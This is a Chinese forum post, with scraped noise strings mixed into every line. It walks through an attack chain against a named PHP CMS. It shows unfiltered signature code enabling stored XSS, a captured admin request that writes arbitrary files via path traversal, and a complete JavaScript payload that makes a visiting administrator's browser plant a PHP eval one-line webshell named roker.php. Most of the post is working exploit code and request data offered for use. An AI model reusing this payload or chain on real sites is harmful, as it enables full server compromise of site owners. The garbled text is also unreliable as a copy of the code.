|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题
# @' u* p) Y2 h4 ~2 c0 R" |. Z4 V官网已经修补了,所以重新下了源码
* D& [: o- \* a因为 后台登入 还需要认证码 所以 注入就没看了。
& S' A2 u5 i# m& l5 \3 c存在 xss! L# A# R8 a d2 J
漏洞文件 user/member/skin_edit.php
% m" S4 |4 `+ G/ ?$ u; Z本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
! g' s7 `' t9 E' C. T9 L$ D0 Y
3 n% \5 E. E+ X" y+ f</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
4 l8 Y9 C* t3 v% |0 q
" W2 [( V, N0 K1 L. `8 O, [( g</textarea></td></tr>
4 Y9 Z1 h9 K9 f+ J 2 }5 S' k5 i" j* ?# |4 _
user/do.php + d( k$ z! L8 a. c+ R0 X
! {+ X' `8 G% w T1 {4 @2 K/ P- x& R8 e* b0 M
if($op=='zl'){ //资料
% a8 y8 W9 `) Q3 S& c ! |# Z+ e" u* {4 a ?0 z6 I
if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email)) 2 e. S3 I- N! u8 _$ l( \7 z
exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);')); e* b2 L' y8 F; M& T; ^. i0 L
" |/ e4 ?! t: p6 [* [ q $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',
' d. t; Y! v/ n z- r5 G" i ; u5 \' d/ a+ g) T2 g5 q
CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
+ e0 g" r$ V" ]* N% b; B where CS_Name='".$cscms_name."'";
9 C+ _* S( e( _5 ^. g4 t4 K
; g- J* E4 }+ u4 `; ] if($db->query($sql)){+ Q& p' y. b# W2 u" h: }% A
1 R3 J7 m2 o% v$ i2 Z( `0 b! V exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));: C) i! l* w2 b8 |
$ d Q$ n0 g2 _% V" X( c' M' c }else{
- Y+ Y/ r$ i5 q+ P3 L7 d+ T: J+ u+ ` $ ~% g) ]- ^( s
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
7 m. `* l; ]5 q' C1 I, b g3 F+ Z- v4 j: B5 a1 g: Z
}
. V0 N# M# R+ _2 c- }2 j- m8 a7 D+ p5 _& O; f3 z" W" m9 p% _' A8 u
; z7 S6 ~ _9 E4 L) t没有 过滤导致xss产生。
# Q5 U7 e9 L; N/ }3 {后台 看了下 很奇葩的是可以写任意格式文件。。5 k$ \7 e2 U& b5 Y3 w5 _* R
抓包。。, ?& r& t! ^) B5 \% v2 x
$ r5 v0 \2 X' u' ^
4 F7 k, {9 P+ r3 v本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
3 K' b) X" i' m0 w . [8 [2 q) `/ u d8 l
Accept: text/html, application/xhtml+xml, */*: K2 W. P, B3 I$ ]+ M
- X# c0 ^5 ?& T7 \Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php" U8 E+ A" |: H
" y n! [( [- L gAccept-Language: zh-CN
3 h' I/ X, ~/ D: j+ j
, @' M$ o& b& uUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)% O# |5 l4 g B
8 R2 e# x8 T n, A, {/ DContent-Type: application/x-www-form-urlencoded
( c# b( t, ]1 X6 L q! |$ y; v
6 d/ h1 n# A! `% R1 n) kAccept-Encoding: gzip, deflate, m/ l8 Y+ T' e$ `" E9 {" ]& W
. P/ Y$ k. c+ L: R0 q3 a& I" WHost: 127.0.0.1
! ?/ H+ ?9 [" i" h5 L7 P! k3 C2 m& \
3 Q4 N( K3 @, [# {! iContent-Length: 38
- j; }' s& L4 L P \/ O8 n ' O7 Z, h' Y# W- o" m
DNT: 1
2 w( I$ F f0 @6 ?" K: t; p8 r
. `( f) O5 R" F {! KConnection: Keep-Alive
) j4 v4 ^8 X7 R7 V; H o6 P- } , }6 D# Z! \6 I# y; x5 Y" _& U4 G, r2 X S
Cache-Control: no-cache
! q' `2 o+ p) A( [, r
# ?. V6 \1 Z, ~Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594, e' i: k- z- b% [. v) f
3 t, \; x5 [/ Y! T; J7 H% S/ V6 R* x
name=aaa.php&content=%3Cs%3E%3Ca%25%3E- ]0 q) W$ c6 S: ~$ c
% |3 p! i) V$ ]3 k& \" ]) @
& w9 s9 i2 {$ @9 b6 ~$ I' L
; }0 S) q k/ D于是 构造js如下。' G( b6 u/ K+ M0 Y* o
9 F! Z+ \7 K/ Y2 z; M: }7 Y
本帖隐藏的内容<script>
! I4 Q1 M1 l; s4 w$ E' O- fthisTHost = top.location.hostname;
& W$ ^4 S2 {' S; M4 x
2 \$ Y0 e d+ M- a \" ~5 X! ethisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
: y$ G; \+ N* h1 H 7 \ Q. O) B: ^- ]. E- T; O
function PostSubmit(url, data, msg) { # Y# r! t/ P9 ?1 k7 M
var postUrl = url;
" @( g: d1 W/ |: b 2 `- N* @- R8 {' P: _8 r
var postData = data;
, C( i: z% b5 T( {* x% | var msgData = msg; * Z$ K# G5 B8 w( z F8 T
var ExportForm = document.createElement("FORM"); % v: u0 L& \( F7 {8 i2 [5 ~! I% A
document.body.appendChild(ExportForm); - B0 Q' ]3 D) k( V1 ]- d6 D
ExportForm.method = "POST";
8 o* ~& c" A2 t# Z var newElement = document.createElement("input"); ! T; q- X T* a& {' W' m
newElement.setAttribute("name", "name");
7 \2 S$ ~" r' Z/ S newElement.setAttribute("type", "hidden");
+ L! O' y" \8 L E+ R/ A var newElement2 = document.createElement("input");
+ V7 i \$ D4 ~3 M5 y2 C: C newElement2.setAttribute("name", "content"); 6 r; u! q9 T0 C2 m
newElement2.setAttribute("type", "hidden"); / r4 { u* _# @8 T
ExportForm.appendChild(newElement); . J" Z4 H8 |! z) L
ExportForm.appendChild(newElement2);
. _( z$ H- p1 `2 Z- Y2 L newElement.value = postData;
( K* Z' ]' ~5 B/ Z7 d2 b newElement2.value = msgData; # j% [2 u5 I9 `. x- G' D
ExportForm.action = postUrl;
. c+ _5 t% i' R% u& L* M ExportForm.submit(); : T7 z. \: z9 x) y. ?; q$ h
};
% b( V1 J+ a5 K/ @7 z3 t8 n
5 K; h# D9 g( |* q0 h( v5 NPostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");5 ^2 q$ ~ e' Y0 U) Z1 U) p1 I
1 o. N/ M' {! i. p& R# ^0 M4 z
</script>
! g: [- V. X! j3 Q/ n# F3 Z4 X" g% G, h+ J% i2 X7 t/ c
4 P; p! ]$ e9 ]7 m
' D6 d9 F/ D; ^, h7 H7 phttp://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入0 l- ?. c& e7 { `) k
用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)
/ |" t2 e t7 @! F0 P就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
2 z* X$ B3 `* V2 E8 w |
|
发表于 2013-11-6 18:09:37
收藏
支持
反对